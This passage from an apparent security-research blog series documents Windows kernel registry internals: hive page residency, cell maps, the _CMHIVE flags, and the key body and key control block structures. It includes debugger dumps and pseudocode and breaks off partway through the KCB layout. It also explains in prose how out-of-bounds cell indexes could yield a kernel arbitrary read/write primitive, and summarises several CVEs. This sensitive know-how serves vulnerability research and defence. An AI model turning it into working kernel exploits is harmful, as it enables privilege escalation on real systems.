    To address both the reliability and security concerns, Windows makes sure to never evict pages corresponding to hives for which exclusive access cannot be guaranteed. This covers hives loaded from a location other than the system volume, and since Windows 10 19H1, also all app hives regardless of the file location. The first way to achieve this is by locking the pages directly in physical memory with a ZwLockVirtualMemory call. It is used for the initial ≤ 2 MiB section views created while loading a hive, up to the working set limit of the Registry process currently set at 64 MiB. The second way is by taking advantage of the copy-on-write mechanism – that is, marking the relevant pages as PAGE_WRITECOPY and subsequently touching each of them using the HvpViewMapTouchPages helper function. This causes the memory manager to create a private copy of each memory page containing the same data as the original, thus preventing them from ever being unavailable for registry operations.

    Between the two types of resident pages, the CoW type effectively becomes the default option in the long term. Eventually most pages converge to this state, even if they initially start as locked. This is because locked pages transition to CoW on multiple occasions, e.g. when converted by the background CmpDoLocalizeNextHive thread that runs every 60 seconds, or during the modification of a cell. On the other hand, once a page transitions to the CoW state, it never reverts to being locked. A diagram illustrating the transitions between the page residence states in a hive loaded from removable/remote storage is shown below:

    State transition diagram illustrating data states like VALID, LOCKED, and COW (Copy-on-Write), and transitions such as load, dirty, and flush, in the context of Windows Registry data management.

    For normal hives loaded from the system volume (i.e. without the VIEW_MAP_MUST_BE_KEPT_LOCAL flag set), the state machine is much simpler:

    Simplified state machine diagram for normal Windows Registry hive loading (without VIEW_MAP_MUST_BE_KEPT_LOCAL flag). It shows a 'load' action leading to a 'VALID' state. A 'dirty' action transitions to a combined 'VALID/WRITABLE/COW_BY_CALLER' state, and a 'flush' action returns to the 'VALID' state.

    As a side note, CVE-2024-43452 was an interesting bug that exploited a flaw in the page residency protection logic. The bug arose because some data wasn't guaranteed to be resident in memory and could be fetched twice from a remote SMB share during bin mapping. This occurred early in the hive loading process, before page residency protections were fully in place. The kernel trusted the data from the second read without re-validation, allowing it to be maliciously set to invalid values, resulting in kernel memory corruption.

    Cell maps

    As discussed in Part 5, almost every cell contains references to other cells in the hive in the form of cell indexes. Consequently, virtually every registry operation involves multiple rounds of translating cell indexes into their corresponding virtual addresses in order to traverse the registry structure. Section views are stored in a red-black tree, so the search complexity is O(log n). This may seem decent, but if we consider that on a typical system, the registry is read much more often than it is extended/shrunk, it becomes apparent that it makes sense to further optimize the search operation at the cost of a less efficient insertion/deletion. And this is exactly what cell maps are: a way of trading slower insertion/deletion complexity – O(n) instead of O(log n) – for a constant O(1) search time. Thanks to this technique, HvpGetCellPaged – perhaps the hottest function in the Windows registry implementation – executes in constant time.

    In technical terms, cell maps are pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers consisting of so-called directories, tables, and entries. As a reminder, the layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry:

    Diagram illustrating the Windows Registry cell index structure and lookup mechanism, showing how the index's fields (Storage selector, Directory index, Table index, Byte offset) navigate through Storage list, Directory, and Table structures to locate a target Cell block.

    Given the nature of the data structure, the corresponding cell map walk involves dereferencing three nested arrays based on the subsequent 1, 10 and 9-bit parts of the cell index, and then adding the final 12-bit offset to the page-aligned address of the target block. The internal kernel structures matching the respective layers of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, all publicly accessible via the ntoskrnl.exe PDB symbols. The entry point to the cell map is the Storage array at the end of the _HHIVE structure:

    0: kd> dt _HHIVE
    nt!_HHIVE
    [...]
       +0x118 Storage          : [2] _DUAL


    The index into the two-element array represents the storage type, 0 for stable and 1 for volatile, so a single _DUAL structure describes a 2 GiB view of a specific storage space:

    0: kd> dt _DUAL
    nt!_DUAL
       +0x000 Length           : Uint4B
       +0x008 Map              : Ptr64 _HMAP_DIRECTORY
       +0x010 SmallDir         : Ptr64 _HMAP_TABLE
       +0x018 Guard            : Uint4B
       +0x020 FreeDisplay      : [24] _FREE_DISPLAY
       +0x260 FreeBins         : _LIST_ENTRY
       +0x270 FreeSummary      : Uint4B


    Let's examine the semantics of each field:

    • Length: Expresses the current length of the given storage space in bytes. Directly after loading the hive, the stable length is equal to the size of the hive on disk (including any data recovered from log files, minus the 4096 bytes of the header), and the volatile space is empty by definition. Only cell map entries within the [0, Length - 1] range are guaranteed to be valid.
    • Map: Points to the actual directory structure represented by _HMAP_DIRECTORY.
    • SmallDir: Part of the "small dir" optimization, discussed in the next section.
    • Guard: Its specific role is unclear, as the field is always initialized to 0xFFFFFFFF upon allocation and never used afterwards. I expect that it is some kind of debugging remnant from the early days of the registry development, presumably related to the small dir optimization.
    • FreeDisplay: A data structure used to optimize searches for free cells during the cell allocation process. It consists of 24 buckets, each corresponding to a specific cell size range and represented by the _FREE_DISPLAY structure, indicating which pages in the hive may potentially contain free cells of the given length.
    • FreeBins: The head of a doubly-linked list that links the descriptors of entirely empty bins in the hive, represented by the _FREE_HBIN structures.
    • FreeSummary: A bitmask indicating which buckets within FreeDisplay have any hints set for the given cell size. A zero bit at a given position means that there are no free cells of the specific size range anywhere in the hive.

    The next level in the cell map hierarchy is the _HMAP_DIRECTORY structure:

    0: kd> dt _HMAP_DIRECTORY
    nt!_HMAP_DIRECTORY
       +0x000 Directory        : [1024] Ptr64 _HMAP_TABLE


    As we can see, it is simply a 1024-element array of pointers to _HMAP_TABLE:

    0: kd> dt _HMAP_TABLE
    nt!_HMAP_TABLE
       +0x000 Table            : [512] _HMAP_ENTRY


    Further, we get a 512-element array of _HMAP_ENTRY structures, the final level of the cell map:

    0: kd> dt _HMAP_ENTRY
    nt!_HMAP_ENTRY
       +0x000 BlockOffset      : Uint8B
       +0x008 PermanentBinAddress : Uint8B
       +0x010 MemAlloc         : Uint4B


    This last level contains a descriptor of a single page in the hive and warrants a deeper analysis. Let's start by noting that the four least significant bits of PermanentBinAddress correspond to a set of undocumented flags that control various aspects of the page behavior. I was able to reverse-engineer them and partially recover their names, largely thanks to the fact that some older Windows 10 builds contained non-inlined functions operating on these flags, with revealing names like HvpMapEntryIsDiscardable or HvpMapEntryIsTrimmed:

    enum _MAP_ENTRY_FLAGS
    {
      MAP_ENTRY_NEW_ALLOC   = 0x1,
      MAP_ENTRY_DISCARDABLE = 0x2,
      MAP_ENTRY_TRIMMED     = 0x4,
      MAP_ENTRY_DUMMY       = 0x8,
    };


    Here's a brief summary of their meaning based on my understanding:

    • MAP_ENTRY_NEW_ALLOC: Indicates that this is the first page of a bin. Cell indexes pointing into this page must specify an offset within the range of [0x20, 0xFFF], as they cannot fall into the first 32 bytes that correspond to the _HBIN structure.
    • MAP_ENTRY_DISCARDABLE: Indicates that the whole bin is empty and consists of a single free cell.
    • MAP_ENTRY_TRIMMED: Indicates that the page has been marked as "trimmed" in HvTrimHive. More specifically, this property is related to hive reorganization, and is set during the loading process on some number of trailing pages that only contain keys accessed during boot, or not accessed at all since the last reorganization. The overarching goal is likely to prevent introducing unnecessary fragmentation in the hive by avoiding mixing together keys with different access histories.
    • MAP_ENTRY_DUMMY: Indicates that the page is allocated from the kernel pool and isn't part of a section view.

    With this in mind, let's dive into the details of each _HMAP_ENTRY structure member:

    • PermanentBinAddress: The lower 4 bits contain the above flags. The upper 60 bits represent the base address of the bin mapping corresponding to this page.
    • BlockOffset: This field has a dual functionality. If the MAP_ENTRY_DISCARDABLE flag is set, it is a pointer to a descriptor of a free bin, _FREE_HBIN, linked into the _DUAL.FreeBins linked list. If it is clear (the typical case), it expresses the offset of the page relative to the start of the bin. Therefore, the virtual address of the block's data in memory can be calculated as (PermanentBinAddress & (~0xF)) + BlockOffset.
    • MemAlloc: If the MAP_ENTRY_NEW_ALLOC flag is set, it contains the size of the bin, otherwise it is zero.

    And this concludes the description of how cell maps are structured. Taking all of it into account, the implementation of the HvpGetCellPaged function starts to make a lot of sense. Its pseudocode comes down to the following:

    _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {
      _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map
                                ->Directory[(Index >> 21) & 0x3FF]
                                ->Table[(Index >> 12) & 0x1FF];

      // The final +4 skips the cell's 32-bit size field, returning a
      // pointer to the cell's payload.
      return (_CELL_DATA *)((Entry->PermanentBinAddress & (~0xF)) +
                            Entry->BlockOffset + (Index & 0xFFF) + 4);
    }


    The same process is followed, for example, by the implementation of the WinDbg !reg cellindex extension, which also translates a pair of a hive pointer and a cell index into the virtual address of the cell.

    The small dir optimization

    There is one other implementation detail about the cell maps worth mentioning here – the small dir optimization. Let's start with the observation that a majority of registry hives in Windows are relatively small, below 2 MiB in size. This can be easily verified by using the !reg hivelist command in WinDbg, and taking note of the values in the "Stable Length" and "Volatile Length" columns. Most of them usually contain values ranging from several kilobytes to hundreds of kilobytes. This would mean that if the kernel allocated the full first-level directory for these hives (taking up 1024 entries × 8 bytes = 8 KiB on 64-bit platforms), they would still only use the first element in it, leading to a non-trivial waste of memory – especially in the context of the early 1990's when the registry was first implemented. In order to optimize this common scenario, Windows developers employed an unconventional approach to simulate a 1-item long "array" with the SmallDir member of the _DUAL structure (a single pointer to _HMAP_TABLE), and have the _DUAL.Map pointer point at its address instead of a separate pool allocation when possible. Later, whenever the hive grows and requires more than one element of the cell map directory, the kernel falls back to the standard behavior and performs a normal pool allocation for the directory array.

    A revised diagram illustrating the cell map layout of a small hive is shown below:

    Diagram illustrating the Windows Registry cell index structure and lookup process with the "small dir" optimization applied for small hives. It shows the Cell index fields (Storage selector, Directory index, Table index, Byte offset). The Directory index points to a "Small directory" structure, visually indicating that although the index allows for 1024 entries, only the first entry is typically represented by the embedded structure in this optimized scenario to save memory, with the rest marked as unused initially. The lookup proceeds via Storage list, Small directory, and Table to locate the target Cell block.

    Here, we can see that indexes 1 through 1023 of the directory array are invalid. Instead of correctly initialized _HMAP_TABLE structures, they point into "random" data corresponding to other members of the _DUAL and the larger _CMHIVE structure that happen to be located after _DUAL.SmallDir. Ordinarily, this is merely a low-level detail that doesn't have any meaningful implications, as all actively loaded hives remain internally consistent and always contain cell indexes that remain within the bounds of the hive's storage space. However, if we look at it through the security lens of hive-based memory corruption, this behavior suddenly becomes very interesting. If an attacker was able to implant an out-of-bounds cell index with the directory index greater than 0 into a hive, they would be able to get the kernel to operate on invalid (but deterministic) data as part of the cell map walk, and enable a powerful arbitrary read/write primitive. In addition to the small dir optimization, this technique is also enabled by the fact that the HvpGetCellPaged routine doesn't perform any bounds checks of the cell indexes, instead blindly trusting that they are always valid.

    If you are curious to learn more about the exploitation aspect of out-of-bounds cell indexes, it was the main subject of my Practical Exploitation of Registry Vulnerabilities in the Windows Kernel talk given at OffensiveCon 2024 (slides and video recording are available). I will also discuss it in more detail in one of the future blog posts focused specifically on the security impact of registry vulnerabilities.

    _CMHIVE structure overview

    Beyond the first member of type _HHIVE at offset 0, the _CMHIVE structure contains more than 3 KiB of further information describing an active hive. This data relates to concepts more abstract than memory management, such as the registry tree structure itself. Below, instead of a field-by-field analysis, we'll focus on the general categories of information within _CMHIVE, organized loosely by increasing complexity of the data structures:

    • Reference count: a 32-bit refcount primarily used during short-term operations on the hive, to prevent the object from being freed while actively operated on. These are used by the thin wrappers CmpReferenceHive and CmpDereferenceHive.
    • File handles and sizes: handles and current sizes of the hive files on disk, such as the main hive file (.DAT) and the accompanying log files (.LOG, .LOG1, .LOG2). The handles are stored in the FileHandles array, and the sizes reside in ActualFileSize and LogFileSizes.
    • Text strings: some informational strings that may prove useful when trying to identify a hive based on its _CMHIVE structure. For example, the hive file name is stored in FileUserName, and the hive mount point path is stored in HiveRootPath.
    • Timestamps: there are several timestamps that can be found in the hive descriptor, such as DirtyTime, UnreconciledTime or LastWriteTime.
    • List entries: instances of the _LIST_ENTRY structure used to link the hive into various double-linked lists, such as the global list of hives in the system (HiveList, starting at nt!CmpHiveListHead), or the list of hives within a common trust class (TrustClassEntry).
    • Synchronization mechanisms: various objects used to synchronize access to the hive as a whole, or some of its parts. Examples include HiveRundown, SecurityLock and HandleClosePendingEvent.
    • Unload history: a 128-element array that stores the number of steps that have been successfully completed in the process of unloading the hive. Its specific purpose is unclear; it might be a debugging artifact retained from older versions of Windows.
    • Late unload state: objects related to deferred unloading of registry hives (LateUnloadWorkItemState, LateUnloadFinishedEvent, LateUnloadWorkItem).
    • Hive layout information: the hive reorganization process in Windows tries to optimize hives by grouping together keys accessed during system runtime, followed by keys accessed during system boot, followed by completely unused keys. If a hive is structured according to this order during load, the kernel saves information about the boundaries between the three distinct areas in the BootStart, UnaccessedStart and UnaccessedEnd members of _CMHIVE.
    • Flushing state and dirty block information: any state that has to do with marking cells as dirty and synchronizing their contents to disk. There are a significant number of fields related to this functionality, with names starting with "Flush...", "Unreconciled..." and "CapturedUnreconciled...".
    • Volume context: a pointer to a public _CMP_VOLUME_CONTEXT structure, which provides extended information about the disk volume of the hive file. As an example, it is used in the internal CmpVolumeContextMustHiveFilePagesBeKeptLocal routine to determine whether the volume is a system one, and consequently whether certain security/reliability assumptions are guaranteed for it or not.
    • KCB table and root KCB: a table of the globally visible KCB (Key Control Block) structures corresponding to keys in the hive, and a pointer to the root key's KCB. I will discuss KCBs in more detail in the "Key structures" section below.
    • Security descriptor cache: a cache of all security descriptors present in the hive, allocated from the kernel pool and thus accessible more efficiently than the underlying hive mappings. In my bug reports, I have often taken advantage of the security cache as a straightforward way to demonstrate the exploitability of security descriptor use-after-frees. A security node UAF can be easily converted into a UAF of its pool-based cached object, which then reliably triggers a Blue Screen of Death when Special Pool is enabled. The security cache of any given hive can be enumerated using the !reg seccache command in WinDbg.
    • Transaction-related objects: a pointer to a _CM_RM structure that describes the Resource Manager object associated with the hive, if "heavyweight" transactions (i.e. KTM transactions) are enabled for it.
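    The list entries mentioned above follow the kernel's intrusive _LIST_ENTRY idiom: the list node is embedded inside the hive descriptor, and the CONTAINING_RECORD macro recovers the enclosing structure when walking a list such as nt!CmpHiveListHead. Below is a minimal user-mode sketch of the pattern; FAKE_CMHIVE is a simplified stand-in of my own, not the real _CMHIVE layout.

```c
#include <assert.h>
#include <stddef.h>

/* Minimal doubly-linked list in the style of the kernel's _LIST_ENTRY. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Recover the enclosing structure from a pointer to its embedded member. */
#define CONTAINING_RECORD(addr, type, field) \
    ((type *)((char *)(addr) - offsetof(type, field)))

typedef struct _FAKE_CMHIVE {
    int         Hive;         /* placeholder for the leading _HHIVE member */
    LIST_ENTRY  HiveList;     /* links the hive into the global hive list */
    const char *FileUserName; /* hive file name, as in the real structure */
} FAKE_CMHIVE;

static void InitializeListHead(LIST_ENTRY *head) {
    head->Flink = head->Blink = head;
}

static void InsertTailList(LIST_ENTRY *head, LIST_ENTRY *entry) {
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

/* Walk the list the way the kernel walks nt!CmpHiveListHead, recovering
 * each hive descriptor from its embedded HiveList entry. */
static int CountHives(LIST_ENTRY *head) {
    int count = 0;
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) {
        FAKE_CMHIVE *hive = CONTAINING_RECORD(e, FAKE_CMHIVE, HiveList);
        (void)hive->FileUserName; /* the full descriptor is now accessible */
        count++;
    }
    return count;
}
```

    The same idiom applies to the other _LIST_ENTRY members of _CMHIVE, such as TrustClassEntry; only the offset passed to CONTAINING_RECORD changes.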

    Last but not least, _CMHIVE has its own Flags field that is different from _HHIVE.Flags. As usual, the flags are not documented, so the listing below is a product of my own analysis:

    enum _CM_HIVE_FLAGS
    {
      CM_HIVE_UNTRUSTED                 = 0x1,
      CM_HIVE_IN_SID_MAPPING_TABLE      = 0x2,
      CM_HIVE_HAS_RM                    = 0x8,
      CM_HIVE_IS_VIRTUALIZABLE          = 0x10,
      CM_HIVE_APP_HIVE                  = 0x20,
      CM_HIVE_PROCESS_PRIVATE           = 0x40,
      CM_HIVE_MUST_BE_REORGANIZED       = 0x400,
      CM_HIVE_DIFFERENCING_WRITETHROUGH = 0x2000,
      CM_HIVE_CLOUDFILTER_PROTECTED     = 0x10000,
    };


    A brief description of each of them is as follows:

    • CM_HIVE_UNTRUSTED: the hive is "untrusted" in the sense of registry symbolic links; in other words, it is not one of the default system hives loaded on boot. The distinction is that trusted hives can freely link to all other hives in the system, while untrusted ones can only link to hives within their so-called trust class. This is to prevent confused deputy-style privilege escalation attacks in the system.
    • CM_HIVE_IN_SID_MAPPING_TABLE: the hive is linked into an internal data structure called the "SID mapping table" (nt!CmpSIDToHiveMapping), used to efficiently look up the user class hives mounted at \Registry\User\<SID>_Classes for the purposes of registry virtualization.
    • CM_HIVE_HAS_RM: KTM transactions are enabled for this hive, meaning that the corresponding .blf and .regtrans-ms files are present in the same directory as the main hive file. The flag is clear if the hive is an app hive or if it was loaded with the REG_HIVE_NO_RM flag set.
    • CM_HIVE_IS_VIRTUALIZABLE: accesses to this hive may be subject to registry virtualization. As far as I know, the only hive with this flag set is currently HKLM\SOFTWARE, which seems in line with the official documentation.
    • CM_HIVE_APP_HIVE: this is an app hive, i.e. it was loaded under \Registry\A with the REG_APP_HIVE flag set.
    • CM_HIVE_PROCESS_PRIVATE: this hive is private to the loading process, i.e. it was loaded with the REG_PROCESS_PRIVATE flag set.
    • CM_HIVE_MUST_BE_REORGANIZED: the hive fragmentation threshold (by default 1 MiB) has been exceeded, and the hive should undergo the reorganization process at the next opportunity. The flag is simply a means of communication between the CmCheckRegistry and CmpReorganizeHive internal routines, both of which execute during hive loading.
    • CM_HIVE_DIFFERENCING_WRITETHROUGH: this is a delta hive loaded in the writethrough mode, which technically means that the DIFF_HIVE_WRITETHROUGH flag was specified in the DiffHiveFlags member of the VRP_LOAD_DIFFERENCING_HIVE_INPUT structure, as discussed in Part 4.
    • CM_HIVE_CLOUDFILTER_PROTECTED: new flag added in December 2024 as part of the fix for CVE-2024-49114. It indicates that the hive file has been protected against being converted to a Cloud Filter placeholder by setting the "$Kernel.CFDoNotConvert" extended attribute (EA) on the file in CmpAdjustFileCFSafety.
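    Some of these flags imply constraints on each other; for example, as noted above, CM_HIVE_HAS_RM is clear for app hives, so it should never appear together with CM_HIVE_APP_HIVE. The sketch below encodes just that one relationship; the HiveFlagsConsistent helper is hypothetical and purely illustrative, not a real kernel routine.

```c
#include <assert.h>

/* Flag values taken from the _CM_HIVE_FLAGS enum above. */
enum {
    CM_HIVE_UNTRUSTED = 0x1,
    CM_HIVE_HAS_RM    = 0x8,
    CM_HIVE_APP_HIVE  = 0x20,
};

/* App hives never get a KTM Resource Manager, so CM_HIVE_HAS_RM and
 * CM_HIVE_APP_HIVE should never be set at the same time. */
static int HiveFlagsConsistent(unsigned int Flags) {
    return !((Flags & CM_HIVE_APP_HIVE) && (Flags & CM_HIVE_HAS_RM));
}
```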

    This concludes the documentation of the hive descriptor structure, arguably the largest and most complex object in the Windows registry implementation.

    Key structures

    The second most important objects in the registry are keys. They can basically be thought of as the essence of the registry, as nearly every registry operation involves them in some way. They are also the one and only registry element that is tightly integrated with the Windows NT Object Manager. This comes with many benefits, as client applications can operate on the registry using standardized handles, and can leverage automatic security checks and object lifetime management. However, this integration also presents its own challenges, as it requires the Configuration Manager to interact with the Object Manager correctly and handle its intricacies and edge cases securely. For this reason, internal key-related structures play a crucial role in the registry implementation. They help organize key state in a way that simplifies keeping it up-to-date and internally consistent. For security researchers, understanding these structures and their semantics is invaluable. This knowledge enables you to quickly identify bugs in existing code or uncover missing handling of unusual but realistic conditions.

    The two fundamental key structures in the Windows kernel are the key body (_CM_KEY_BODY) and key control block (_CM_KEY_CONTROL_BLOCK). The key body is directly associated with a key handle in the NT Object Manager, similar to the role that the _FILE_OBJECT structure plays for file handles. In other words, this is the initial object that the kernel obtains whenever it calls ObReferenceObjectByHandle to reference a user-supplied handle. Several key body structures may exist concurrently for a single key, one for each program holding an active handle to it. Conversely, the key control block represents the global state of a specific key and is used to manage its general properties. This means that for most keys in the system, there is at most one KCB allocated at a time. There may be no KCB for keys that haven't been accessed yet (as they are initialized by the kernel lazily), and there may be more than one KCB for the same registry path if the key has been deleted and created again (these two instances of the key are treated as separate entities, with one of them being marked as deleted/non-existent). Taking this into account, the relationship between key bodies and KCBs is many-to-one, with all of the key bodies of a single KCB being connected in a doubly-linked list, as shown in the diagram below:

    Diagram illustrating the many-to-one relationship between Windows Registry Key Bodies and a Key Control Block (KCB). A single KCB is shown linked to multiple Key Body structures. These Key Bodies are themselves connected together in a doubly-linked list, which is associated with the parent KCB.

    The following subsections provide more detail about each of these two structures.

    Key body

    The key body structure is allocated and initialized in the internal CmpCreateKeyBody routine, and freed by the NT Object Manager when all references to the object are dropped. It is a relatively short and simple object with the following definition:

    0: kd> dt _CM_KEY_BODY
    nt!_CM_KEY_BODY
       +0x000 Type             : Uint4B
       +0x004 AccessCheckedLayerHeight : Uint2B
       +0x008 KeyControlBlock  : Ptr64 _CM_KEY_CONTROL_BLOCK
       +0x010 NotifyBlock      : Ptr64 _CM_NOTIFY_BLOCK
       +0x018 ProcessID        : Ptr64 Void
       +0x020 KeyBodyList      : _LIST_ENTRY
       +0x030 Flags            : Pos 0, 16 Bits
       +0x030 HandleTags       : Pos 16, 16 Bits
       +0x038 Trans            : _CM_TRANS_PTR
       +0x040 KtmUow           : Ptr64 _GUID
       +0x048 ContextListHead  : _LIST_ENTRY
       +0x058 EnumerationResumeContext : Ptr64 Void
       +0x060 RestrictedAccessMask : Uint4B
       +0x064 LastSearchedIndex : Uint4B
       +0x068 LockedMemoryMdls : Ptr64 Void


    Let's quickly go over each field:

    • Type: for normal keys (i.e. almost all of them), this field is set to a magic value of 0x6B793032 ('ky02'). However, for predefined keys, this is the 32-bit value of the link's target key with the highest bit set. This member is therefore used to distinguish between regular keys and predefined ones, for example in CmObReferenceObjectByHandle. Predefined keys have now been largely deprecated, but it is still possible to observe a non-standard Type value by opening a handle to one of the last two remaining ones: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 and CurrentLanguage under the same path.
    • AccessCheckedLayerHeight: a new field added in November 2023 as part of the fix for CVE-2023-36404. It is used for layered keys and contains the index of the lowest layer in the key stack that was access-checked when opening the key. It is later taken into account during other registry operations, in order to avoid leaking data from lower-layer, more restrictive keys that could have been created since the handle was opened.
    • KeyControlBlock: a pointer to the corresponding key control block.
    • NotifyBlock: an optional pointer to the notify block associated with this handle. This is related to the key notification functionality in Windows and is described in more detail in the "Key notification structures" section below.
    • ProcessID: the PID of the process that created the handle. It doesn't seem to serve any purpose in the kernel other than to be enumerable using the NtQueryOpenSubKeysEx system call (which requires SeRestorePrivilege, and is therefore available to administrators only).
    • KeyBodyList: the list entry used to link all the key bodies within a single KCB together.
    • Flags: a set of flags concerning the specific key body. Here's my interpretation of them based on reverse engineering:
    • KEY_BODY_HIVE_UNLOADED (0x1): indicates that the underlying hive of the key has been unloaded and is no longer active.
    • KEY_BODY_DONT_RELOCK (0x2): this seems to be a short-term flag used to communicate between CmpCheckKeyBodyAccess/CmpCheckOpenAccessOnKeyBody and the nested CmpDoQueryKeyName routine, in order to indicate that the key's KCB is already locked and shouldn't be relocked again.
    • KEY_BODY_DONT_DEINIT (0x4): if this flag is set, CmpDeleteKeyObject returns early and doesn't proceed with the regular deinitialization of the key body object. However, it is unclear if/where the flag is set in the code, as I personally haven't found any instances of it happening during my analysis.
    • KEY_BODY_DELETED (0x8): indicates that the key has been deleted since the handle was opened, and it no longer exists.
    • KEY_BODY_DONT_VIRTUALIZE (0x10): indicates that registry virtualization is disabled for this handle, as a result of opening the key with the (undocumented but present in SDK headers) REG_OPTION_DONT_VIRTUALIZE flag.
    • HandleTags: from the kernel perspective, this is simply a general purpose 16-bit storage that can be set by clients on a per-handle basis using NtSetInformationKey with the KeySetHandleTagsInformation information class, and queried with NtQueryKey and the KeyHandleTagsInformation information class. As far as I know, the kernel doesn't dictate how this field should be used and leaves it up to the registry clients. In practice, it seems to be mostly used for purposes related to WOW64 and the Registry Redirector, storing flags such as KEY_WOW64_64KEY (0x100) and KEY_WOW64_32KEY (0x200), as well as some internal ones. The WOW64 functionality is implemented in KernelBase.dll, and functions such as ConstructKernelKeyPath and LocalBaseRegOpenKey are a good starting point for reverse engineering, if you're curious to learn more. I have also observed the 0x1000 handle tag being set in the internal IopApplyMutableTagToRegistryKey kernel routine for keys such as HKLM\System\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, but I'm unsure of its meaning.
    • Trans: indicates the transactional state of the handle. If the handle is not transacted (i.e. it wasn't opened with RegOpenKeyTransacted or RegCreateKeyTransacted), it is set to zero. Otherwise, the lowest bit specifies the type of the transaction: 0 for KTM and 1 for lightweight transactions. The remaining bits form a pointer to the associated transaction object, either of the TmTransactionObjectType type (represented by the _KTRANSACTION structure), or of the CmRegistryTransactionType type (represented by a non-public structure that I've personally named _CM_LIGHTWEIGHT_TRANS_OBJECT).
    • KtmUow: if the handle is associated with a KTM transaction, this field stores the GUID that uniquely identifies it. For non-transacted and lightweight-transacted handles, the field is unused.
    • ContextListHead: this is the head of the doubly-linked list of contexts that have been associated with the key body using the CmSetCallbackObjectContext function. It is related to the registry callbacks functionality; see also the Specifying Context Information MSDN article for more details.
    • EnumerationResumeContext: this is part of an optimization of the subkey enumeration process of layered keys (implemented in CmpEnumerateLayeredKey). Performing full enumeration of a layered key from scratch up to the given index is a very complex task, and repeating it over and over for each iteration of an enumeration loop would be very inefficient. The resume context helps address the problem for sequential enumeration by saving the intermediate state reached at an NtEnumerateKey call with a given index, and being able to resume from it when a request for index+1 comes next. It also has the added benefit of making it possible to stop and restart the enumeration process in the scope of a single system call, which is used to pause the operation and temporarily release some locks if the code detects that the registry is particularly congested. This happens at the intersection of the CmEnumerateKey and CmpEnumerateLayeredKey functions, with the latter potentially returning STATUS_RETRY and the former resuming the operation if such a situation arises.
    • RestrictedAccessMask, LastSearchedIndex, LockedMemoryMdls: relatively new fields introduced in Windows 10 and 11, which I haven't looked very deeply into and thus won't discuss in detail here.

    After a key handle is translated into the corresponding _CM_KEY_BODY structure using the ObReferenceObjectByHandle(CmKeyObjectType) call, typically early in the execution of a registry-related system call, there are three primary operations that are usually performed. First, the kernel does a key status check by evaluating the expression KeyBody.Flags & 9 to determine if the key is associated with an unloaded hive (flag 0x1) or has been deleted (flag 0x8). This check is essential because most registry operations are only permitted on active, existing keys, and enforcing this condition is a fundamental step for guaranteeing registry state consistency. Second, the code accesses the KeyControlBlock pointer, which provides further access to the hive pointer (KCB.KeyHive), the key's cell index (KCB.KeyCell), and other necessary fields and data structures required to perform any meaningful read/write actions on the key. Finally, the code checks the key body's Trans/KtmUow members to determine if the handle is part of a transaction, and if so, the transaction is used as additional context for the action requested by the caller. Accesses to other members of the _CM_KEY_BODY structure are less frequent and serve more specialized purposes.
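    The key status check described above can be sketched in C as follows. The CheckKeyBodyStatus helper and the STATUS_* values are simplified stand-ins for illustration, not the actual kernel routine; only the flag values come from the listing above.

```c
#include <assert.h>

/* Key body flags from the listing above. */
#define KEY_BODY_HIVE_UNLOADED 0x1
#define KEY_BODY_DELETED       0x8

/* Simplified stand-ins for the relevant status codes. */
#define STATUS_SUCCESS       0
#define STATUS_KEY_DELETED   1
#define STATUS_HIVE_UNLOADED 2

/* The "KeyBody.Flags & 9" status check: a key body is usable only if
 * its hive is still loaded and the key hasn't been deleted. */
static int CheckKeyBodyStatus(unsigned short Flags) {
    if ((Flags & (KEY_BODY_HIVE_UNLOADED | KEY_BODY_DELETED)) == 0)
        return STATUS_SUCCESS;      /* key is active and usable */
    if (Flags & KEY_BODY_HIVE_UNLOADED)
        return STATUS_HIVE_UNLOADED;
    return STATUS_KEY_DELETED;
}
```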

    Key control block

    The key control block object can be thought of as the heart of the Windows kernel registry tree representation. It is effectively the descriptor of a single key in the system, and the second most important key-related object after the key node. It is always allocated from the kernel pool, and serves four main purposes:

    1. Mirrors frequently used information from the key node to make it faster to access by the kernel code. This includes building an efficient, in-memory representation of the registry tree to optimize the traversal time when referring to registry paths.
    2. Works as a single point of reference for all active handles to a specific key, and helps synchronize access to the key in the multithreaded Windows environment.
    3. Represents any pending, transacted state of the registry key that has been introduced by a client, but not fully committed yet.
    4. Represents any complex relationships between registry keys that extend beyond the internal structure of the hive. The primary example are differencing hives, which are overlaid on top of each other, and whose corresponding keys form so-called key stacks.

    Blog post #2 in this series highlighted the dramatic growth of the registry codebase across successive Windows versions, illustrating the subsystem's steady expansion over the last few decades. Similarly, the size of the Key Control Block (KCB) itself has nearly doubled over time, from 168 bytes in Windows XP x64 to 312 bytes in the latest Windows 11 release. This expansion underscores the increasing amount of information associated with every registry key, which the kernel must manage consistently and securely.

    The KCB structure layout is present in the PDB symbols and can be displayed in WinDbg:

    0: kd> dt _CM_KEY_CONTROL_BLOCK
    nt!_CM_KEY_CONTROL_BLOCK
       +0x000 RefCount         : Uint8B
       +0x008 ExtFlags         : Pos 0, 16 Bits
       +0x008 Freed            : Pos 16, 1 Bit
       +0x008 Discarded        : Pos 17, 1 Bit
       +0x008 HiveUnloaded     : Pos 18, 1 Bit
       +0x008 Decommissioned   : Pos 19, 1 Bit
       +0x008 SpareExtFlag     : Pos 20, 1 Bit
       +0x008 TotalLevels      : Pos 21, 10 Bits
       +0x010 KeyHash          : _CM_KEY_HASH
       +0x010 ConvKey          : _CM_PATH_HASH
       +0x018 NextHash         : Ptr64 _CM_KEY_HASH
       +0x020 KeyHive          : Ptr64 _HHIVE
       +0x028 KeyCell          : Uint4B
       +0x030 KcbPushlock      : _EX_PUSH_LOCK
       +0x038 Owner            : Ptr64 _KTHREAD
       +0x038 SharedCount      : Int4B
       +0x040 DelayedDeref     : Pos 0, 1 Bit
       +0x040 DelayedClose     : Pos 1, 1 Bit
       +0x040 Parking          : Pos 2, 1 Bit
